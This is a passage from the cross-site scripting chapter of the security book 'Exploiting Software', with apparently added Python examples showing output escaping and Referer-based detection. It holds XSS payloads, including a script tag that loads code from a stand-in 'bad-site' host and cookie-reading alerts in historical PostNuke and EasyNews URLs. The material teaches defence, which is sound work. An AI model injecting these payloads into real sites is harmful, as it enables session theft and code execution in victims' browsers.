File: Exploiting Software - How to Break Code.pdf
Downloads: 107
Added: 15.03.2015
Size: 7.95 MB

Exploiting Software: How to Break Code
By Greg Hoglund, Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512

How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.

Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

This must-have book may shock you—and it will certainly educate you. Getting beyond the script kiddie treatment found in many hacking books, you will learn about

Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits

Exploiting Software is filled with the tools, concepts, and knowledge necessary to break software.

Cross-site Scripting (XSS)

Cross-site scripting (XSS) has become a popular subject in security, but XSS is really only yet another example of in-band signals being interpreted by client software—in this case, the Web browser. It is a popular attack because Web sites are both common and numerous.

To carry out an XSS attack, an attacker can place a booby trap within data using special escape codes. This is a modern form of using terminal escape codes in filenames or talk requests. The terminal, in this case, is the Web browser, which includes advanced features such as the capability to run embedded Javascript. The attack can inject some toxic Javascript or some other mobile code element into data that are later executed by another user of the server. The code executes on the victim's client machine, sometimes causing havoc for the victim. Figure 5-1 shows an example of Web-based XSS in action.

Figure 5-1. XSS illustrated. The attacker sends active content to a victim, which invokes a script on the vulnerable Web site (2). Later, once invoked in the victim's Web browser, hitting the vulnerable Web site (3), the script runs (4) and allows the attacker access (5).

 

In some cases an attacker may be able to include a script such as the following in a payload:

<script SRC='http://bad-site/badfile'></SCRIPT>

In this case the script source is obtained from an outside system. The final script, however, is executed within the security context of the browser–server connection of the original site. The "cross-site" label originates from the fact that the script source is obtained from an outside, untrusted source.

* Attack Example: Javascript Alert Dialog XSS

One innocuous kind of XSS attack causes a pop-up dialog to appear, saying whatever the attacker wants. This is commonly used as a test against a site. An attacker simply inserts the following script code into forms on the target site:

<script>alert("some text");</script>

When viewing subsequent pages, the attacker expects that a dialog box with "some text" will pop up.

Using Reflection against Trusted Sites

Consider a situation in which an attacker sends e-mail that contains an embedded script. The victim does not trust the e-mail message and may thus have scripting disabled. The attack therefore fails.

Now assume that the same victim uses a popular on-line system. The attacker may know that the victim uses and trusts the on-line system. The attacker may also have found an XSS vulnerability on that system. Armed with this knowledge, the attacker can send e-mail with a link to the trusted target site with script embedded. The link may contain data that are posted to the target site, doing something such as posting a message. The link may look something like

<a href="trusted.site.com/cgi-bin/post_message.pl?my message goes here">click me</a>

If the victim clicks the link, the message "my message goes here" will be posted to the target site. The target site will then display the message back to the victim. This is a very common form of XSS attack. Thus, a cross-site problem on the target site can be used to echo script back to the victim. The script is not contained in the e-mail itself, but is instead "bounced" off the target site. Once the victim views the messages that were posted, the script becomes active in the victim's browser.

The following link may result in a Javascript pop-up message:

<a href="trusted.site.com/cgi-bin/post_message.pl?&ltscript&gtalert('hello!')&lt/script&gt">click me</a>

The message posted to the server is

&ltscript&gtalert('hello!')&lt/script&gt

and the target server is likely to convert this text (because of the escape characters) to

<script>alert('hello!')</script>

Thus, when the victim views the result of their post, their browser is given script code to execute.

Attack Pattern: Simple Script Injection

As a normal user of a system there are opportunities to supply input to the system. This input may include text, numbers, cookies, parameters, and so forth. Once these values are accepted by the system, they may be stored and used later. If the data are used in a server response (such as a message board, where the data are stored and then displayed back to users), an attacker can "pollute" these data with code that will be interpreted by unsuspecting client terminals.

* Attack Example: Simple Script Injection

If a database stores text records, an attacker can insert a record that contains Javascript. The Javascript might be something like

<script>alert("Warning, boot sector corrupted");</script>

This causes a pop-up message on the client terminal that displays the (fake) error message. An unsuspecting user might be highly confused by this. A more insidious attack might include a script that ... files on the client hard drive, or a proxy attack.

ICQ (a large company acquired by AOL) had a problem like this on their Web site. A user could insert malicious HTML code or script into a message that would later be displayed to other users. The attack looked something like this:

http://search.icq.com/dirsearch.adp?query<script>alert('hello');</script>est&wh

Many Web sites that maintain guest books or message bases suffer from these problems. The popular news site Slashdot.org, for example, had such a problem (recently corrected). Testing for this problem is simple: The attacker pastes script into an input field and observes the result.
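Both scenarios above, the link "bounced" off post_message.pl and the polluted message-base record, rest on one defect: text a user supplied is written into a page without being encoded for the HTML context. The Python script below is an added example, not code from the book or from any site it names; it models a tiny in-memory message base standing in for post_message.pl or a guest book (message_from_link, render_vulnerable, render_escaped and contains_active_content are this example's own names, and the posted messages are constructed from the patterns in the text). It shows the server turning the entity-escaped post back into a live script element, as the text describes, and the same stored records rendered inert by escaping at output time.

```python
import html
from urllib.parse import urlsplit, unquote

# Constructed inputs, copied from the patterns described in the text.
LINK_REFLECTED = "trusted.site.com/cgi-bin/post_message.pl?&ltscript&gtalert('hello!')&lt/script&gt"
RECORD_STORED = '<script>alert("Warning, boot sector corrupted");</script>'
RECORD_BENIGN = "my message goes here"


def message_from_link(href):
    """Return the message that clicking the link would post.

    post_message.pl, as the text describes it, takes the whole query string
    (everything after '?') as the message body.
    """
    return unquote(urlsplit(href).query)


def render_vulnerable(messages):
    """Target site as the text describes it: the entity 'escape characters'
    are converted back (&lt -> <, &gt -> >) and the text is echoed verbatim."""
    return "\n".join("<p>" + html.unescape(m) + "</p>" for m in messages)


def render_escaped(messages):
    """Hardened form: each stored message is HTML-escaped at output time, so
    the browser displays <, >, quotes and & as text instead of parsing them."""
    return "\n".join("<p>" + html.escape(m, quote=True) + "</p>" for m in messages)


def contains_active_content(page):
    """Check a tester can run on a rendered page: did markup that would run
    on the client survive the rendering path?"""
    lowered = page.lower()
    return "<script" in lowered or "javascript:" in lowered


def demo():
    """Post the messages from the text through both renderers and report
    whether live script reached the page in each case."""
    posted = [RECORD_BENIGN, message_from_link(LINK_REFLECTED), RECORD_STORED]
    return {
        "vulnerable": contains_active_content(render_vulnerable(posted)),
        "escaped": contains_active_content(render_escaped(posted)),
    }


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name:10s} page carries active content: {hit}")
```

The point of keeping the raw record in the store and escaping only on output is that the same defence covers every path that displays the record, including the reflected "click me" case and the stored "boot sector" case, without the server having to guess which characters are dangerous.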

Attack Pattern: Embedding Script in Nonscript Elements

Script does not need to be inserted between <script> tags. Instead, script can appear as part of another HTML tag, such as the image tag. The injection vector is

<img src=javascript:alert(document.domain)>

* Attack Example: Embedded Script in Nonscript Element from GNU Mailman XSS

Consider the following URL:

http://host/mailman/listinfo/<img%20src=user_inserted_script>
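The lesson of this pattern for a defender is that a filter which looks for <script> tags cannot work, because the text shows script arriving in an image tag instead. The Python below is an added example, not code from the book or from GNU Mailman; it runs the two vectors from the text, plus the list name a Mailman-style URL path would echo, through a blocklist filter and through HTML escaping (strip_script_tags, escape_for_html, markup_survives and list_name_from_path are this example's own names, and user_inserted_script is left as the text's placeholder).

```python
import html
import re
from urllib.parse import unquote

# Constructed inputs, matching the vectors the text describes.
SCRIPT_TAG_VECTOR = "<script>alert('hello')</script>"
IMG_VECTOR = "<img src=javascript:alert(document.domain)>"
MAILMAN_PATH = "http://host/mailman/listinfo/<img%20src=user_inserted_script>"

SCRIPT_BLOCK = re.compile(r"<script\b.*?</script\s*>", re.IGNORECASE | re.DOTALL)
# An unencoded tag opener reaching the page means the browser will parse
# markup out of user data, whatever tag it turns out to be.
TAG_OPENER = re.compile(r"<[a-zA-Z/!]")


def strip_script_tags(text):
    """Blocklist filter: removes <script>...</script> and nothing else."""
    return SCRIPT_BLOCK.sub("", text)


def escape_for_html(text):
    """Escaping: no tag survives, because every delimiter is encoded."""
    return html.escape(text, quote=True)


def markup_survives(vector, filter_fn):
    """Does any tag opener reach the page after the given filter?"""
    return bool(TAG_OPENER.search(filter_fn(vector)))


def list_name_from_path(url_path):
    """Mailman-style: the last path segment is the list name the page echoes.
    Percent-decoding happens here, as it would on the server, before use."""
    return unquote(url_path.rsplit("/", 1)[-1])


def demo():
    """Table of vector -> {filter name: did markup get through}."""
    vectors = {
        "script_tag": SCRIPT_TAG_VECTOR,
        "img_tag": IMG_VECTOR,
        "mailman_path": list_name_from_path(MAILMAN_PATH),
    }
    return {
        name: {
            "blocklist": markup_survives(v, strip_script_tags),
            "escaped": markup_survives(v, escape_for_html),
        }
        for name, v in vectors.items()
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:13s} blocklist={outcome['blocklist']} escaped={outcome['escaped']}")
```

The blocklist passes the script-tag vector and fails both image-tag vectors; escaping neutralises all three because it does not need to know which tags exist.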

Attack Pattern: XSS in HTTP Headers

The HTTP headers of a request are always available to a server for consumption. No matter the context or where data are positioned, if the data are from the client, they should clearly be untrusted. However, in many cases programmers overlook header information. For some reason, header information is treated as holy ground that cannot be controlled by the user. This pattern takes advantage of this oversight to inject data via a header field.

* Attack Example: HTTP Headers in Webalizer XSS

A program called webalizer can analyze logs of Web requests. Sometimes search engines will put data in the Referrer field when they make a request. Webalizer can (for example) search all requests from search engines and compile a list of search keywords. The keywords, once obtained, are compiled into an HTML page.

An XSS attack can execute via these search terms. This involves faking a request from a search engine, putting embedded script into the search term itself. Webalizer copies the attack string, unfiltered, into its catalog of known search terms, where it is then activated by an administrator.
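The Webalizer case is worth tracing end to end, because the data take a detour: a request header lands in a log file, a reporting tool reads the log, and the administrator's browser renders the report. The Python below is an added example, not Webalizer's code; it parses a few constructed Apache combined-format log lines, pulls the search term out of each Referer, builds the keyword report both unencoded and escaped, and, for the detection side, flags the client whose Referer carries markup (COMBINED, search_terms, report_vulnerable, report_escaped and flag_suspicious_referers are this example's own names; the log lines and addresses are constructed).

```python
import html
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines in Apache "combined" format. The Referer field
# (the second-to-last quoted string) is entirely client-controlled; the third
# line imitates a faked search-engine request carrying script in the search term.
LOG_LINES = [
    '203.0.113.5 - - [10/Mar/2004:12:00:01 +0000] "GET / HTTP/1.1" 200 512 '
    '"http://search.example/search?q=exploiting+software" "Mozilla/4.0"',
    '203.0.113.6 - - [10/Mar/2004:12:00:02 +0000] "GET /docs HTTP/1.1" 200 2048 '
    '"http://search.example/search?q=buffer+overflow" "Mozilla/4.0"',
    '198.51.100.9 - - [10/Mar/2004:12:00:03 +0000] "GET / HTTP/1.1" 200 512 '
    '"http://search.example/search?q=%3Cscript%3Ealert(1)%3C/script%3E" "Mozilla/4.0"',
]

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def search_terms(lines):
    """Collect the q= keyword from each Referer, as a log analyzer compiling
    a search-keyword report would."""
    terms = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        query = urlsplit(m.group("referer")).query
        terms.extend(parse_qs(query).get("q", []))  # parse_qs percent-decodes
    return terms


def report_vulnerable(terms):
    """Keyword page built by concatenation: header data reaches the
    administrator's browser unencoded."""
    return "<ul>" + "".join(f"<li>{t}</li>" for t in terms) + "</ul>"


def report_escaped(terms):
    """Same report with each term HTML-escaped: header data is displayed,
    never parsed."""
    return "<ul>" + "".join(f"<li>{html.escape(t, quote=True)}</li>" for t in terms) + "</ul>"


def flag_suspicious_referers(lines):
    """Detection: client addresses whose Referer, once decoded, carries a tag
    opener or a javascript: URL."""
    flagged = []
    for line in lines:
        m = COMBINED.match(line)
        if m and re.search(r"<[a-zA-Z/!]|javascript:", unquote(m.group("referer")), re.IGNORECASE):
            flagged.append(m.group("ip"))
    return flagged


if __name__ == "__main__":
    terms = search_terms(LOG_LINES)
    print(report_escaped(terms))
    print("suspicious referers from:", flag_suspicious_referers(LOG_LINES))
```

Note that the detection has to percent-decode the header first: in the raw log the third line contains no literal angle bracket, which is exactly why a reviewer eyeballing the log would miss it.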

Attack Pattern: HTTP Query Strings

A query string takes variable = value pairs. These are passed to the target executable or script designated in the request. A variable can be injected with script. The script is processed and stored in a way that is later visible to a user.

* Attack Example: PostNuke Content Management System XSS

The PostNuke content management system (http://www.postnuke.com/) had a vulnerability in which user-supplied HTML could be injected. The following URL carried out a simple query string attack:

http://[website]/user.php?op=userinfo&uname=<script>alert(document.cookie);</script>

* Attack Example: EasyNews PHP Script XSS

The following HTML request could at one time cause a post to be made, which includes an XSS attack:

http://[target]/index.php?action=comments&do=save&id=1&cid=../news&
name=11/11/11&kommentar=%20&e-mail=hax0r&zeit=<img src=javascript:alert(documen...
,11:11,../news,
bugs@securityalert.=com&datum=easynews%20exploited
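Because a query string arrives as named variables, the server can do something it cannot do with free text: decide per variable which values are even plausible, and reject the rest before they are processed or stored. The Python below is an added example, not PostNuke's code; it parses a request shaped like the user.php URL in the text (with the text's [website] placeholder swapped for a constructed hostname so urlsplit accepts it), checks each variable against a hypothetical allowlist, and still escapes the accepted value on output so the two defences do not depend on each other (ALLOWED, parse_query, validate and render_userinfo are this example's own names).

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed requests. The first has the shape of the PostNuke URL in the
# text, with "[website]" replaced by a hostname; the second is a benign
# request to the same script.
REQUEST_INJECTED = "http://target.example/user.php?op=userinfo&uname=<script>alert(document.cookie);</script>"
REQUEST_BENIGN = "http://target.example/user.php?op=userinfo&uname=alice_42"

# Hypothetical per-variable allowlists: each query variable the script
# accepts gets a pattern describing the only values that make sense for it.
ALLOWED = {
    "op": re.compile(r"userinfo|login|logout"),
    "uname": re.compile(r"[A-Za-z0-9_.-]{1,32}"),  # account names carry no delimiters at all
}


def parse_query(url):
    """Split the query string into (variable, value) pairs, percent-decoded."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def validate(url):
    """Input side: unknown variables and values outside their allowlist are
    rejected before anything is processed or stored."""
    accepted, rejected = {}, []
    for name, value in parse_query(url):
        rule = ALLOWED.get(name)
        if rule is None:
            rejected.append((name, "unknown variable"))
        elif not rule.fullmatch(value):
            rejected.append((name, "value fails allowlist"))
        else:
            accepted[name] = value
    return accepted, rejected


def render_userinfo(url):
    """Output side: even an accepted value is HTML-escaped when echoed."""
    accepted, rejected = validate(url)
    if rejected:
        return "<p>Request rejected.</p>"
    return f"<h1>User: {html.escape(accepted.get('uname', ''), quote=True)}</h1>"


if __name__ == "__main__":
    for url in (REQUEST_INJECTED, REQUEST_BENIGN):
        print(validate(url))
        print(render_userinfo(url))
```

Rejecting with a fixed message rather than echoing the offending value matters too: an error page that prints "unknown user <value>" would reintroduce the same problem on the rejection path.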

Attack Pattern: User-Controlled Filename

An unfiltered, user-controlled filename can be used to construct client HTML. Perhaps HTML text is being built from filenames. This can be the case if a Web server is exposing a directory on the file system, for example. If the server does not filter certain characters, the filename itself can include an XSS attack.
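A directory index is a good illustration of why "filter certain characters" is the wrong framing: the same filename is placed into two different contexts of the page, the href attribute (a URL) and the link text (HTML), and each needs its own encoding. The Python below is an added example, not any Web server's code; it builds a listing from a constructed directory whose last entry carries markup, first by pasting names in and then with per-context encoding (FILENAMES, listing_vulnerable, listing_escaped and unencoded_script_count are this example's own names).

```python
import html
from urllib.parse import quote

# Constructed directory contents. The last name carries markup, the kind of
# filename the text says an unfiltered directory index would paste into HTML.
FILENAMES = [
    "readme.txt",
    "report 2004.pdf",
    "notes&plans.html",
    "<script>alert(document.domain)</script>.mp3",
]


def listing_vulnerable(names):
    """Directory index built by pasting each filename straight into the markup."""
    return "".join(f'<a href="{n}">{n}</a><br>\n' for n in names)


def listing_escaped(names):
    """Hardened index. The filename lands in two contexts and each gets the
    encoder for that context: percent-encoding inside the href (a URL) and
    entity escaping for the link text (HTML text)."""
    return "".join(
        f'<a href="{quote(n)}">{html.escape(n, quote=True)}</a><br>\n' for n in names
    )


def unencoded_script_count(page):
    """Check: how many times does a raw '<script' opener reach the page?"""
    return page.lower().count("<script")


if __name__ == "__main__":
    print("vulnerable:", unencoded_script_count(listing_vulnerable(FILENAMES)))
    print("escaped:   ", unencoded_script_count(listing_escaped(FILENAMES)))
    print(listing_escaped(FILENAMES))
```

The vulnerable listing leaks the script opener twice, once in each context; the ordinary names with a space or an ampersand also come out wrong in the vulnerable version, which is a useful reminder that the encoding is needed for correctness, not only for security.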

* Attack Example: XSS in MP3 Files and Spreadsheets

The cross-site problem is not confined to Web sites alone. There are many types of media files that can contain embedded URLs, including MP3 music files, video files, postscripts, PDFs, and even spreadsheet files. The client programs used to view these kinds of files may interpret the embedded URL data directly or may pass the HTML data to an embedded Web browser, such as the Microsoft Internet Explorer control. Once the content is transferred, the embedded data are subject to the same problems as in a traditional XSS attack.

Microsoft considers the XSS problem extremely serious and devotes considerable attention to eradicating XSS vulnerabilities during their self-described "security push" phase of software development.[3]

[3] The book Writing Secure Code [Howard and LeBlanc, 2002] describes how security has been integrated into the software development life cycle.